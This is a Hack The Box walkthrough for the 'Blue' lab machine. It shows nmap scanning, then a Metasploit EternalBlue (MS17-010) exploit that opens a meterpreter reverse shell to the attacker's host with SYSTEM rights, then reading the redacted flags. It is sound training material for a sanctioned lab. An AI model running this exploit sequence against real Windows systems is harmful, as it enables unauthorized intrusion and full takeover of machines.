SYNOPSIS
Outlining the attack path demonstrated in this writeup is much easier through a picture rather than a description, since a picture is worth a thousand words.
The aim of this walkthrough is to provide help with the Blue machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out with finishing the Beginner-Track challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
We could use the unset command to remove it after we no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
Finally, a very simple and basic file structure used throughout this writeup for this particular pentest:
- 1_recon –> information gathering, enumeration and scanning, active/passive recon
- 2_exploitation –> exploits, foothold, lateral movement
- 3_post-exploitation –> privilege-escalation, lateral movement, persistence
Generating it is can be done by the following one-liner:
mkdir 1_recon; mkdir 2_exploitation; mkdir 3_post-exploitation
INFORMATION-GATHERING
As usual, we start out by a quick connection check
# shell command
ping -c 4 -n -R $rhost > connection-test.txt
# terminal interaction
┌─[eu-dedivip-1]─[10.10.14.20]─[htb-bluewalle@htb-ysgugzuhsh]─[~/blue/1_recon]
└──╼ [★]$ ping -c 4 -n -R $rhost > connection-test.txt
┌─[eu-dedivip-1]─[10.10.14.20]─[htb-bluewalle@htb-ysgugzuhsh]─[~/blue/1_recon]
└──╼ [★]$ cat connection-test.txt
PING 10.129.174.73 (10.129.174.73) 56(124) bytes of data.
64 bytes from 10.129.174.73: icmp_seq=1 ttl=127 time=4.78 ms
64 bytes from 10.129.174.73: icmp_seq=2 ttl=127 time=3.46 ms
64 bytes from 10.129.174.73: icmp_seq=3 ttl=127 time=3.29 ms
64 bytes from 10.129.174.73: icmp_seq=4 ttl=127 time=3.08 ms
--- 10.129.174.73 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 3.075/3.651/4.778/0.664 ms
┌─[eu-dedivip-1]─[10.10.14.20]─[htb-bluewalle@htb-ysgugzuhsh]─[~/blue/1_recon]
└──╼ [★]$
followed by the usual(version, default scripts, top-ports) tcp scan.
# shell command
nmap -sV -sC -on nmap-service-defscripts-topports-scan $rhost
# terminal interaction
┌─[eu-dedivip-1]─[10.10.14.20]─[htb-bluewalle@htb-ysgugzuhsh]─[~/blue/1_recon]
└──╼ [★]$ nmap -sV -sC -on nmap-service-defscripts-topports-scan $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-03 09:53 BST
Failed to resolve "nmap-service-defscripts-topports-scan".
Nmap scan report for 10.129.174.73
Host is up (0.068s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m57s, deviation: 34m37s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-06-03T09:54:40+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-06-03T08:54:41
|_ start_date: 2023-06-03T08:32:42
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.93 seconds
┌─[eu-dedivip-1]─[10.10.14.20]─[htb-bluewalle@htb-ysgugzuhsh]─[~/blue/1_recon]
└──╼ [★]$
A couple of ports are reported open. One thing clearly stands out though:
- 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
or put simply, smb running on a quite old os.
Doing a quick internet search for it’s reported vulnerabilities lands us with - MS17-010 EternalBlue - which is the famous EternalBlue exploit. The same exploit that was used by the WannaCry ransomware a couple of years back… and exploits CVE-2017-0144.
Since there is already an exploit written for it in metasploit, so we simply continue from there on.
EXPLOITATION
Firing up metasploit
# shell command
msfconsole -q
# terminal interaction
┌─[eu-dedivip-1]─[10.10.14.20]─[htb-bluewalle@htb-ysgugzuhsh]─[~/blue/2_exploitation]
└──╼ [★]$ msfconsole -q
[msf](Jobs:0 Agents:0) >>
and searching for the aforementioned exploit
# msf command
search ms17-010 eternalblue
# terminal interaction
[msf](Jobs:0 Agents:0) >> search ms17-010 eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
[msf](Jobs:0 Agents:0) >>
provides us with some options. The one we will be using here is the most common one for EternalBlue, which is available at - exploit/windows/smb/ms17_010_eternalblue -. Selecting it,
# msf command
use 0
[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
# terminal interaction
and querying the module for information helps us verify, that the exploit is indeed appropriate for our current case.
# msf command
info
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> info
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
Provided by:
Equation Group
Shadow Brokers
sleepya
Sean Dillon <sean.dillon@risksense.com>
Dylan Davis <dylan.davis@risksense.com>
thelightcosine
wvu <wvu@metasploit.com>
agalway-r7
cdelafuente-r7
cdelafuente-r7
agalway-r7
Available targets:
Id Name
-- ----
=> 0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
4 Windows 8
5 Windows 8.1
6 Windows Server 2012
7 Windows 10 Pro
8 Windows 10 Enterprise Evaluation
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.
com/docs/using-metasploit/basics/using-metasploi
t.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authent
ication. Only affects Windows Server 2008 R2, Wi
ndows 7, Windows Embedded Standard 7 target mach
ines.
SMBPass no (Optional) The password for the specified userna
me
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Tar
get. Only affects Windows Server 2008 R2, Window
s 7, Windows Embedded Standard 7 target machines
.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only
affects Windows Server 2008 R2, Windows 7, Windo
ws Embedded Standard 7 target machines.
Payload information:
Space: 2000
Description:
This module is a port of the Equation Group ETERNALBLUE exploit,
part of the FuzzBunch toolkit released by Shadow Brokers. There is a
buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
where a DWORD is subtracted into a WORD. The kernel pool is groomed
so that overflow is well laid-out to overwrite an SMBv1 buffer.
Actual RIP hijack is later completed in
srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
not trigger 100% of the time, and should be run continuously until
triggered. It seems like the pool will get hot streaks and need a
cool down period before the shells rain in again. The module will
attempt to use Anonymous login, by default, to authenticate to
perform the exploit. If the user supplies credentials in the
SMBUser, SMBPass, and SMBDomain options it will use those instead.
On some systems, this module may cause system instability and
crashes, such as a BSOD or a reboot. This may be more likely with
some payloads.
References:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
https://nvd.nist.gov/vuln/detail/CVE-2017-0143
https://nvd.nist.gov/vuln/detail/CVE-2017-0144
https://nvd.nist.gov/vuln/detail/CVE-2017-0145
https://nvd.nist.gov/vuln/detail/CVE-2017-0146
https://nvd.nist.gov/vuln/detail/CVE-2017-0147
https://nvd.nist.gov/vuln/detail/CVE-2017-0148
https://github.com/RiskSense-Ops/MS17-010
https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf
https://www.exploit-db.com/exploits/42030
Also known as:
ETERNALBLUE
View the full module info with the info -d command.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
Great, since it fits, all that’s left is to properly configure it and then run it. Listing the module’s options should help us with the configuration.
# msf command
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit
.com/docs/using-metasploit/basics/using-metaspl
oit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authen
tication. Only affects Windows Server 2008 R2,
Windows 7, Windows Embedded Standard 7 target m
achines.
SMBPass no (Optional) The password for the specified usern
ame
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Ta
rget. Only affects Windows Server 2008 R2, Wind
ows 7, Windows Embedded Standard 7 target machi
nes.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only
affects Windows Server 2008 R2, Windows 7, Win
dows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process,
none)
LHOST 161.35.38.166 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
Looking at the default configuration, we can leave almost all the settings untouched, except of course, the target and local hosts settings.
Now, we could of course specify our target host’s OS too, setting it to - OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) - which was reported earlier during port scanning, but the module ships with automatic architecture and os discovery, so why bother.
# msf command
set rhosts $rhost
set lhost tun0
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set rhosts 10.129.174.73
rhosts => 10.129.174.73
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set lhost tun0
lhost => 10.10.14.20
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
Looks like everything is properly set up, so let’s run a quick check and see if our target is vulnerable or not.
# msf command
check
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> check
[*] 10.129.174.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.174.73:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.174.73:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.174.73:445 - The target is vulnerable.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
It appears that our target is indeed vulnerable, so we run our exploit.
# msf command
run
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run
[*] Started reverse TCP handler on 10.10.14.20:4444
[*] 10.129.174.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.174.73:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.174.73:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.174.73:445 - The target is vulnerable.
[*] 10.129.174.73:445 - Connecting to target for exploitation.
[+] 10.129.174.73:445 - Connection established for exploitation.
[+] 10.129.174.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.174.73:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.174.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.129.174.73:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.129.174.73:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.129.174.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.174.73:445 - Trying exploit with 12 Groom Allocations.
[*] 10.129.174.73:445 - Sending all but last fragment of exploit packet
[*] 10.129.174.73:445 - Starting non-paged pool grooming
[+] 10.129.174.73:445 - Sending SMBv2 buffers
[+] 10.129.174.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.174.73:445 - Sending final SMBv2 buffers.
[*] 10.129.174.73:445 - Sending last fragment of exploit packet!
[*] 10.129.174.73:445 - Receiving response from exploit packet
[+] 10.129.174.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.174.73:445 - Sending egg to corrupted connection.
[*] 10.129.174.73:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.129.174.73
[*] Meterpreter session 1 opened (10.10.14.20:4444 -> 10.129.174.73:49158) at 2023-06-03 10:49:25 +0100
[+] 10.129.174.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.174.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.174.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
(Meterpreter 1)(C:\Windows\system32) >
A meterpreter session was successfully opened and we have a shell connection to our target. As we can see, we are logged in with the NT AUTHORITY\SYSTEM account, which has the highest privileges on a a local windows system, it’s even more powerful that than the local admin account. Therefore, there is simply no need for any lateral movement or privilege escalation on our part, we already possess the privileges to access both of the flags.
# msf command
getuid
# terminal interaction
(Meterpreter 1)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
(Meterpreter 1)(C:\Windows\system32) >
POST-EXPLOITATION
All that’s left for us now is to find and grab both the user and the root flags. We drop into the system command shell, since traversing the directories on a windows system might seem easier via cmd.
# msf command
shell
# terminal interaction
(Meterpreter 1)(C:\Windows\system32) > shell
Process 1128 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Once we identify the local user account - haris -, we head over to his Desktop and grab the user flag.
# msf command
shell
# terminal interaction
C:\Windows\system32> cd c:\users\
cd c:\users\
c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of c:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,694,017,024 bytes free
c:\Users>cd haris\desktop\
cd haris\desktop\
c:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of c:\Users\haris\Desktop
24/12/2017 03:23 <DIR> .
24/12/2017 03:23 <DIR> ..
03/06/2023 09:33 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 2,694,017,024 bytes free
c:\Users\haris\Desktop>type user.txt
type user.txt
<user-flag>
c:\Users\haris\Desktop>
Grabbing the root flag is even easier, we already know that it is usually sitting on the Administrator’s Desktop.
# msf command
type c:\users\administrator\desktop\root.txt
# terminal interaction
c:\Users\haris\Desktop> cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of c:\Users\Administrator\Desktop
24/12/2017 03:22 <DIR> .
24/12/2017 03:22 <DIR> ..
03/06/2023 09:33 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,694,017,024 bytes free
c:\Users\Administrator\Desktop>type root.txt
type root.txt
<root-flag>
c:\Users\Administrator\Desktop>
With this, we just successfully pwned the target machine, congratulations. All that’s left for us now is to submit the flags and then terminate the target box (if not terminated already)!